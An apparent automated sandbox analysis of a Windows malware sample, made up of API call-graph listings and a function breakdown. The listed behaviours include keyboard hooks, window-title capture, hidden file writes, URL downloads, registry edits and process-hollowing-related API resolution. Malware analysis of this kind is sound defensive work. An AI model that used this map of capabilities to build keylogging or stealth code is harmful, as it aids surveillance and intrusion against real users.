41b8b3 54560->54996 54563 4020df 11 API calls 54564 414f54 54563->54564 54565 401e65 22 API calls 54564->54565 54566 414f62 54565->54566 54567 43baac _strftime 40 API calls 54566->54567 54568 414f6f 54567->54568 54569 414f81 54568->54569 54570 414f74 Sleep 54568->54570 54571 402093 28 API calls 54569->54571 54570->54569 54572 414f90 54571->54572 54573 401e65 22 API calls 54572->54573 54574 414f99 54573->54574 54575 4020f6 28 API calls 54574->54575 54576 414fa4 54575->54576 54577 41be1b 28 API calls 54576->54577 54578 414fac 54577->54578 55000 40489e WSAStartup 54578->55000 54580 414fb6 54581 401e65 22 API calls 54580->54581 54582 414fbf 54581->54582 54583 401e65 22 API calls 54582->54583 54628 41503e 54582->54628 54584 414fd8 54583->54584 54585 401e65 22 API calls 54584->54585 54587 414fe9 54585->54587 54586 4020f6 28 API calls 54586->54628 54589 401e65 22 API calls 54587->54589 54588 41be1b 28 API calls 54588->54628 54590 414ffa 54589->54590 54592 401e65 22 API calls 54590->54592 54591 406c1e 28 API calls 54591->54628 54593 41500b 54592->54593 54595 401e65 22 API calls 54593->54595 54594 401fe2 28 API calls 54594->54628 54596 41501c 54595->54596 54597 401e65 22 API calls 54596->54597 54598 41502e 54597->54598 55025 40473d 89 API calls 54598->55025 54600 40531e 28 API calls 54600->54628 54601 401e65 22 API calls 54601->54628 54603 41518c WSAGetLastError 55026 41cae1 30 API calls 54603->55026 54604 40482d 3 API calls 54604->54628 54607 404f51 105 API calls 54607->54628 54608 402093 28 API calls 54609 41519c 54608->54609 54609->54608 54612 401e65 22 API calls 54609->54612 54613 401e8d 11 API calls 54609->54613 54614 43baac _strftime 40 API calls 54609->54614 54609->54628 54645 41b4ef 80 API calls 54609->54645 54646 415a71 CreateThread 54609->54646 54647 401fd8 11 API calls 54609->54647 54648 401f09 11 API calls 54609->54648 55027 4052fd 28 API calls 54609->55027 55028 40b051 85 API calls 54609->55028 55029 404e26 99 API calls 54609->55029 54610 4048c8 97 API calls 54610->54628 54612->54609 54613->54609 54615 415acf Sleep 54614->54615 54615->54609 54616 402093 28 API calls 54616->54628 54617 41b4ef 80 API calls 54617->54628 54620 40905c 28 API calls 54620->54628 54621 441e81 20 API calls 54621->54628 54622 4136f8 3 API calls 54622->54628 54623 4135a6 31 API calls 54623->54628 54624 40417e 28 API calls 54624->54628 54627 41bd1e 28 API calls 54627->54628 54628->54586 54628->54588 54628->54591 54628->54594 54628->54600 54628->54601 54628->54603 54628->54604 54628->54607 54628->54609 54628->54610 54628->54616 54628->54617 54628->54620 54628->54621 54628->54622 54628->54623 54628->54624 54628->54627 54629 41bb8e 28 API calls 54628->54629 54630 401e65 22 API calls 54628->54630 54634 41ba96 30 API calls 54628->54634 54636 402f31 28 API calls 54628->54636 54637 406383 28 API calls 54628->54637 54638 402ea1 28 API calls 54628->54638 54639 402f10 28 API calls 54628->54639 54640 404aa1 61 API calls 54628->54640 54641 401fd8 11 API calls 54628->54641 54642 401f09 11 API calls 54628->54642 54643 404c10 273 API calls 54628->54643 55001 414ee9 54628->55001 55006 41b7e0 54628->55006 55009 4145bd 54628->55009 55012 40dd89 54628->55012 55018 41bc42 54628->55018 55021 41bae6 GetLastInputInfo GetTickCount 54628->55021 55022 40f8d1 GetLocaleInfoA 54628->55022 54629->54628 54631 415439 GetTickCount 54630->54631 54632 41bb8e 28 API calls 54631->54632 54632->54628 54634->54628 54636->54628 54637->54628 54638->54628 54639->54628 54640->54628 54641->54628 54642->54628 54643->54628 54645->54609 54646->54609 55070 41ad17 105 API calls 54646->55070 54647->54609 54648->54609 54649->54163 54650->54172 54651->54176 54654 4020df 11 API calls 54653->54654 54655 406c2a 54654->54655 54656 4032a0 28 API calls 54655->54656 54657 406c47 54656->54657 54657->54197 54659 40eba4 54658->54659 54660 413573 RegQueryValueExA RegCloseKey 54658->54660 54659->54194 54659->54211 54660->54659 54661->54201 54662->54230 54663->54223 54664->54215 54665->54228 54666->54299 54667->54322 54669 41371e RegQueryValueExA RegCloseKey 54668->54669 54670 413742 54668->54670 54669->54670 54670->54281 54671->54316 54676 4344ef 54672->54676 54673 43bd51 _Yarn 21 API calls 54673->54676 54674 40f0d1 54674->54352 54676->54673 54676->54674 55071 442f80 7 API calls 2 library calls 54676->55071 55072 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54676->55072 55073 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54676->55073 54680 402093 28 API calls 54679->54680 54681 40d9ff 54680->54681 54682 41bc5e 28 API calls 54681->54682 54683 40da0a 54682->54683 54684 40da34 32 API calls 54683->54684 54685 40da1b 54684->54685 54686 401f09 11 API calls 54685->54686 54687 40da24 54686->54687 54688 401fd8 11 API calls 54687->54688 54689 40da2c 54688->54689 54689->54386 54690->54372 54692->54416 54693->54221 54696 41b4c5 LoadResource LockResource SizeofResource 54695->54696 54697 40f3de 54695->54697 54696->54697 54697->54448 54699 4020b7 28 API calls 54698->54699 54700 406dec 54699->54700 54700->54459 54701->54462 54704 4135d4 RegQueryValueExA RegCloseKey 54703->54704 54705 4135fe 54703->54705 54704->54705 54706 402093 28 API calls 54705->54706 54707 413613 54706->54707 54707->54472 54708->54480 54710 40a127 54709->54710 54711 413549 3 API calls 54710->54711 54712 40a12e 54711->54712 54713 40a142 54712->54713 54714 40a15c 54712->54714 54715 409e9b 54713->54715 54716 40a147 54713->54716 54730 40905c 54714->54730 54715->54345 54718 40905c 28 API calls 54716->54718 54720 40a155 54718->54720 54758 40a22d 29 API calls 54720->54758 54723 40a15a 54723->54715 54724->54525 54888 403222 54725->54888 54727 403022 54728 403262 11 API calls 54727->54728 54729 403031 54728->54729 54729->54530 54731 409072 54730->54731 54732 402252 11 API calls 54731->54732 54733 40908c 54732->54733 54734 404267 28 API calls 54733->54734 54735 40909a 54734->54735 54736 40a179 54735->54736 54759 40b8ec 54736->54759 54739 40a1a2 54742 402093 28 API calls 54739->54742 54740 40a1ca 54741 402093 28 API calls 54740->54741 54744 40a1d5 54741->54744 54743 40a1ac 54742->54743 54745 41bc5e 28 API calls 54743->54745 54746 402093 28 API calls 54744->54746 54747 40a1ba 54745->54747 54748 40a1e4 54746->54748 54763 40b164 31 API calls _Yarn 54747->54763 54750 41b4ef 80 API calls 54748->54750 54752 40a1e9 CreateThread 54750->54752 54751 40a1c1 54753 401fd8 11 API calls 54751->54753 54754 40a210 CreateThread 54752->54754 54755 40a204 CreateThread 54752->54755 54771 40a27d 54752->54771 54753->54740 54756 401f09 11 API calls 54754->54756 54768 40a289 54754->54768 54755->54754 54765 40a267 54755->54765 54757 40a224 54756->54757 54757->54715 54758->54723 54887 40a273 163 API calls 54758->54887 54760 40b8f5 54759->54760 54761 40a197 54759->54761 54764 40b96c 28 API calls 54760->54764 54761->54739 54761->54740 54763->54751 54764->54761 54774 40a2b8 54765->54774 54791 40acd6 54768->54791 54829 40a726 54771->54829 54775 40a2d1 SetWindowsHookExA 54774->54775 54776 40a333 GetMessageA 54774->54776 54775->54776 54780 40a2ed GetLastError 54775->54780 54777 40a345 TranslateMessage DispatchMessageA 54776->54777 54778 40a270 54776->54778 54777->54776 54777->54778 54781 41bb8e 28 API calls 54780->54781 54782 40a2fe 54781->54782 54790 4052fd 28 API calls 54782->54790 54798 40ace4 54791->54798 54792 40a292 54793 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 54795 40b904 28 API calls 54793->54795 54795->54798 54796 401f86 11 API calls 54796->54798 54798->54792 54798->54793 54798->54796 54800 41bae6 GetLastInputInfo GetTickCount 54798->54800 54801 40ad84 GetWindowTextW 54798->54801 54803 40aedc 54798->54803 54804 40b8ec 28 API calls 54798->54804 54806 40ae49 Sleep 54798->54806 54807 441e81 20 API calls 54798->54807 54809 402093 28 API calls 54798->54809 54813 403014 28 API calls 54798->54813 54814 406383 28 API calls 54798->54814 54816 40add1 54798->54816 54817 40a636 12 API calls 54798->54817 54818 41bc5e 28 API calls 54798->54818 54819 401f09 11 API calls 54798->54819 54820 401fd8 11 API calls 54798->54820 54821 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 54798->54821 54822 434770 23 API calls __onexit 54798->54822 54823 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 54798->54823 54824 409044 28 API calls 54798->54824 54826 40b97c 28 API calls 54798->54826 54827 40b748 40 API calls 2 library calls 54798->54827 54828 4052fd 28 API calls 54798->54828 54800->54798 54801->54798 54805 401f09 11 API calls 54803->54805 54804->54798 54805->54792 54806->54798 54807->54798 54809->54798 54812 40905c 28 API calls 54812->54816 54813->54798 54814->54798 54816->54798 54816->54812 54825 40b164 31 API calls _Yarn 54816->54825 54817->54798 54818->54798 54819->54798 54820->54798 54822->54798 54823->54798 54824->54798 54825->54816 54826->54798 54827->54798 54830 40a73b Sleep 54829->54830 54850 40a675 54830->54850 54832 40a286 54833 40a77b CreateDirectoryW 54838 40a74d 54833->54838 54834 40a78c GetFileAttributesW 54834->54838 54835 40a7a3 SetFileAttributesW 54835->54838 54836 4020df 11 API calls 54848 40a76f 54836->54848 54838->54830 54838->54832 54838->54834 54838->54835 54840 401e65 22 API calls 54838->54840 54843 40a926 SetFileAttributesW 54838->54843 54838->54848 54862 41c3f1 54838->54862 54839 40a81d PathFileExistsW 54839->54848 54840->54838 54842 4020b7 28 API calls 54842->54848 54843->54838 54844 401fe2 28 API calls 54844->54848 54845 406dd8 28 API calls 54845->54848 54846 401fd8 11 API calls 54846->54848 54848->54833 54848->54836 54848->54839 54848->54842 54848->54844 54848->54845 54848->54846 54849 401fd8 11 API calls 54848->54849 54872 41c485 CreateFileW 54848->54872 54880 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 54848->54880 54849->54838 54851 40a722 54850->54851 54853 40a68b 54850->54853 54851->54838 54852 40a6aa CreateFileW 54852->54853 54854 40a6b8 GetFileSize 54852->54854 54853->54852 54855 40a6ed CloseHandle 54853->54855 54856 40a6ff 54853->54856 54857 40a6e2 Sleep 54853->54857 54881 40b0dc 84 API calls 54853->54881 54854->54853 54854->54855 54855->54853 54856->54851 54859 40905c 28 API calls 54856->54859 54857->54855 54860 40a71b 54859->54860 54861 40a179 124 API calls 54860->54861 54861->54851 54863 41c404 CreateFileW 54862->54863 54865 41c441 54863->54865 54866 41c43d 54863->54866 54867 41c461 WriteFile 54865->54867 54868 41c448 SetFilePointer 54865->54868 54866->54838 54870 41c474 54867->54870 54871 41c476 FindCloseChangeNotification 54867->54871 54868->54867 54869 41c458 CloseHandle 54868->54869 54869->54866 54870->54871 54871->54866 54873 41c4ab 54872->54873 54874 41c4af GetFileSize 54872->54874 54873->54848 54882 40244e 54874->54882 54876 41c4c3 54877 41c4d5 ReadFile 54876->54877 54878 41c4e2 54877->54878 54879 41c4e4 CloseHandle 54877->54879 54878->54879 54879->54873 54880->54848 54881->54857 54883 402456 54882->54883 54885 402460 54883->54885 54886 402a51 28 API calls 54883->54886 54885->54876 54886->54885 54889 40322e 54888->54889 54892 403618 54889->54892 54891 40323b 54891->54727 54893 403626 54892->54893 54894 403644 54893->54894 54895 40362c 54893->54895 54897 40365c 54894->54897 54898 40369e 54894->54898 54896 4036a6 28 API calls 54895->54896 54902 403642 54896->54902 54900 4027e6 28 API calls 54897->54900 54897->54902 54903 4028a4 22 API calls 54898->54903 54900->54902 54902->54891 54909 404353 54904->54909 54906 40430a 54907 403262 11 API calls 54906->54907 54908 404319 54907->54908 54908->54538 54910 40435f 54909->54910 54913 404371 54910->54913 54912 40436d 54912->54906 54914 40437f 54913->54914 54915 404385 54914->54915 54916 40439e 54914->54916 54977 4034e6 28 API calls 54915->54977 54917 402888 22 API calls 54916->54917 54918 4043a6 54917->54918 54920 404419 54918->54920 54921 4043bf 54918->54921 54978 4028a4 22 API calls 54920->54978 54923 4027e6 28 API calls 54921->54923 54932 40439c 54921->54932 54923->54932 54932->54912 54977->54932 54985 43aa9a 54979->54985 54983 41388f RegSetValueExA RegCloseKey 54982->54983 54984 4138b9 54982->54984 54983->54984 54984->54557 54988 43aa1b 54985->54988 54987 40170d 54987->54555 54989 43aa2a 54988->54989 54990 43aa3e 54988->54990 54994 4405dd 20 API calls __dosmaperr 54989->54994 54993 43aa2f __alldvrm _Atexit 54990->54993 54995 448957 11 API calls 2 library calls 54990->54995 54993->54987 54994->54993 54995->54993 54997 41b8f9 _Yarn ___scrt_get_show_window_mode 54996->54997 54998 402093 28 API calls 54997->54998 54999 414f49 54998->54999 54999->54563 55000->54580 55002 414f02 getaddrinfo WSASetLastError 55001->55002 55003 414ef8 55001->55003 55002->54628 55030 414d86 29 API calls ___std_exception_copy 55003->55030 55005 414efd 55005->55002 55031 41b7b6 GlobalMemoryStatusEx 55006->55031 55008 41b7f5 55008->54628 55032 414580 55009->55032 55013 40dda5 55012->55013 55014 4134ff 3 API calls 55013->55014 55016 40ddac 55014->55016 55015 40ddc4 55015->54628 55016->55015 55017 413549 3 API calls 55016->55017 55017->55015 55019 4020b7 28 API calls 55018->55019 55020 41bc57 55019->55020 55020->54628 55021->54628 55023 402093 28 API calls 55022->55023 55024 40f8f6 55023->55024 55024->54628 55025->54628 55026->54609 55028->54609 55029->54609 55030->55005 55031->55008 55035 414553 55032->55035 55036 414568 ___scrt_initialize_default_local_stdio_options 55035->55036 55039 43f79d 55036->55039 55042 43c4f0 55039->55042 55043 43c530 55042->55043 55044 43c518 55042->55044 55043->55044 55046 43c538 55043->55046 55064 4405dd 20 API calls __dosmaperr 55044->55064 55065 43a7b7 36 API calls 3 library calls 55046->55065 55048 43c548 55066 43cc76 20 API calls 2 library calls 55048->55066 55049 43c51d _Atexit 55057 434fcb 55049->55057 55052 43c5c0 55067 43d2e4 51 API calls 3 library calls 55052->55067 55053 414576 55053->54628 55056 43c5cb 55068 43cce0 20 API calls _free 55056->55068 55058 434fd6 IsProcessorFeaturePresent 55057->55058 55059 434fd4 55057->55059 55061 435018 55058->55061 55059->55053 55069 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55061->55069 55063 4350fb 55063->55053 55064->55049 55065->55048 55066->55052 55067->55056 55068->55049 55069->55063 55071->54676 55076 40f7c2 55074->55076 55075 413549 3 API calls 55075->55076 55076->55075 55077 40f866 55076->55077 55079 40f856 Sleep 55076->55079 55084 40f7f4 55076->55084 55080 40905c 28 API calls 55077->55080 55078 40905c 28 API calls 55078->55084 55079->55076 55083 40f871 55080->55083 55082 41bc5e 28 API calls 55082->55084 55085 41bc5e 28 API calls 55083->55085 55084->55078 55084->55079 55084->55082 55089 401f09 11 API calls 55084->55089 55092 402093 28 API calls 55084->55092 55096 41376f 14 API calls 55084->55096 55107 40d096 112 API calls ___scrt_get_show_window_mode 55084->55107 55108 413814 14 API calls 55084->55108 55086 40f87d 55085->55086 55109 413814 14 API calls 55086->55109 55089->55084 55090 40f890 55091 401f09 11 API calls 55090->55091 55093 40f89c 55091->55093 55092->55084 55094 402093 28 API calls 55093->55094 55095 40f8ad 55094->55095 55097 41376f 14 API calls 55095->55097 55096->55084 55098 40f8c0 55097->55098 55110 412850 TerminateProcess WaitForSingleObject 55098->55110 55100 40f8c8 ExitProcess 55111 4127ee 62 API calls 55102->55111 55108->55084 55109->55090 55110->55100 55112 415d06 55127 41b380 55112->55127 55114 415d0f 55115 4020f6 28 API calls 55114->55115 55116 415d1e 55115->55116 55117 404aa1 61 API calls 55116->55117 55118 415d2a 55117->55118 55119 417089 55118->55119 55120 401fd8 11 API calls 55118->55120 55121 401e8d 11 API calls 55119->55121 55120->55119 55122 417092 55121->55122 55123 401fd8 11 API calls 55122->55123 55124 41709e 55123->55124 55125 401fd8 11 API calls 55124->55125 55126 4170aa 55125->55126 55128 4020df 11 API calls 55127->55128 55129 41b38e 55128->55129 55130 43bd51 _Yarn 21 API calls 55129->55130 55131 41b39e InternetOpenW InternetOpenUrlW 55130->55131 55132 41b3c5 InternetReadFile 55131->55132 55136 41b3e8 55132->55136 55133 41b415 InternetCloseHandle InternetCloseHandle 55135 41b427 55133->55135 55134 4020b7 28 API calls 55134->55136 55135->55114 55136->55132 55136->55133 55136->55134 55137 401fd8 11 API calls 55136->55137 55137->55136 55138 1000c7a7 55139 1000c7be 55138->55139 55144 1000c82c 55138->55144 55139->55144 55150 1000c7e6 GetModuleHandleA 55139->55150 55140 1000c872 55141 1000c835 GetModuleHandleA 55143 1000c83f 55141->55143 55143->55144 55145 1000c85f GetProcAddress 55143->55145 55144->55140 55144->55141 55144->55143 55145->55144 55146 1000c7dd 55146->55143 55146->55144 55147 1000c800 GetProcAddress 55146->55147 55147->55144 55148 1000c80d VirtualProtect 55147->55148 55148->55144 55149 1000c81c VirtualProtect 55148->55149 55149->55144 55151 1000c7ef 55150->55151 55157 1000c82c 55150->55157 55162 1000c803 GetProcAddress 55151->55162 55153 1000c872 55154 1000c835 GetModuleHandleA 55160 1000c83f 55154->55160 55155 1000c7f4 55156 1000c800 GetProcAddress 55155->55156 55155->55157 55156->55157 55158 1000c80d VirtualProtect 55156->55158 55157->55153 55157->55154 55157->55160 55158->55157 55159 1000c81c VirtualProtect 55158->55159 55159->55157 55160->55157 55161 1000c85f GetProcAddress 55160->55161 55161->55157 55163 1000c82c 55162->55163 55164 1000c80d VirtualProtect 55162->55164 55166 1000c872 55163->55166 55167 1000c835 GetModuleHandleA 55163->55167 55164->55163 55165 1000c81c VirtualProtect 55164->55165 55165->55163 55168 1000c83f 55167->55168 55168->55163 55168->55168 55169 1000c85f GetProcAddress 55168->55169 55169->55168 55170 44375d 55171 443766 55170->55171 55172 44377f 55170->55172 55173 44376e 55171->55173 55177 4437e5 55171->55177 55175 443776 55175->55173 55188 443ab2 22 API calls 2 library calls 55175->55188 55178 4437f1 55177->55178 55179 4437ee 55177->55179 55189 44f3dd GetEnvironmentStringsW 55178->55189 55179->55175 55183 446782 _free 20 API calls 55184 443833 55183->55184 55184->55175 55185 443809 55197 446782 55185->55197 55187 4437fe 55187->55183 55188->55172 55190 44f3f1 55189->55190 55191 4437f8 55189->55191 55203 446137 55190->55203 55191->55187 55196 44390a 26 API calls 3 library calls 55191->55196 55193 44f405 _Yarn 55194 446782 _free 20 API calls 55193->55194 55195 44f41f FreeEnvironmentStringsW 55194->55195 55195->55191 55196->55185 55198 44678d RtlFreeHeap 55197->55198 55199 4467b6 __dosmaperr 55197->55199 55198->55199 55200 4467a2 55198->55200 55199->55187 55212 4405dd 20 API calls __dosmaperr 55200->55212 55202 4467a8 GetLastError 55202->55199 55204 446175 55203->55204 55209 446145 __Getctype 55203->55209 55211 4405dd 20 API calls __dosmaperr 55204->55211 55206 446160 RtlAllocateHeap 55207 446173 55206->55207 55206->55209 55207->55193 55209->55204 55209->55206 55210 442f80 7 API calls 2 library calls 55209->55210 55210->55209 55211->55207 55212->55202 55213 43be58 55216 43be64 _swprintf ___BuildCatchObject 55213->55216 55214 43be72 55229 4405dd 20 API calls __dosmaperr 55214->55229 55216->55214 55217 43be9c 55216->55217 55224 445888 EnterCriticalSection 55217->55224 55219 43be77 ___BuildCatchObject _Atexit 55220 43bea7 55225 43bf48 55220->55225 55224->55220 55227 43bf56 55225->55227 55226 43beb2 55230 43becf LeaveCriticalSection std::_Lockit::~_Lockit 55226->55230 55227->55226 55231 44976c 37 API calls 2 library calls 55227->55231 55229->55219 55230->55219 55231->55227 55232 40165e 55233 401666 55232->55233 55234 401669 55232->55234 55235 4016a8 55234->55235 55238 401696 55234->55238 55236 4344ea new 22 API calls 55235->55236 55237 40169c 55236->55237 55239 4344ea new 22 API calls 55238->55239 55239->55237

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                    • API String ID: 4236061018-3687161714
                                                                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 101 40f34f-40f36a call 401fab call 4139a9 call 412475 69->101 80 40ec03-40ec0a call 40d069 70->80 81 40ebcb-40ebea call 401fab call 413549 70->81 89 40ec13-40ec1a 80->89 90 40ec0c-40ec0e 80->90 81->80 97 40ebec-40ec02 call 401fab call 4139a9 81->97 94 40ec1c 89->94 95 40ec1e-40ec2a call 41b2c3 89->95 93 40eef1 90->93 93->49 94->95 105 40ec33-40ec37 95->105 106 40ec2c-40ec2e 95->106 97->80 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 101->126 108 40ec76-40ec89 call 401e65 call 401fab 105->108 109 40ec39 call 407716 105->109 106->105 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 142 40ec61-40ec67 121->142 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 142->108 143 40ec69-40ec6f 142->143 143->108 146 40ec71 call 407260 143->146 146->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 205 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->205 236 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->236 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 191 40ee1e-40ee42 call 40247c call 434798 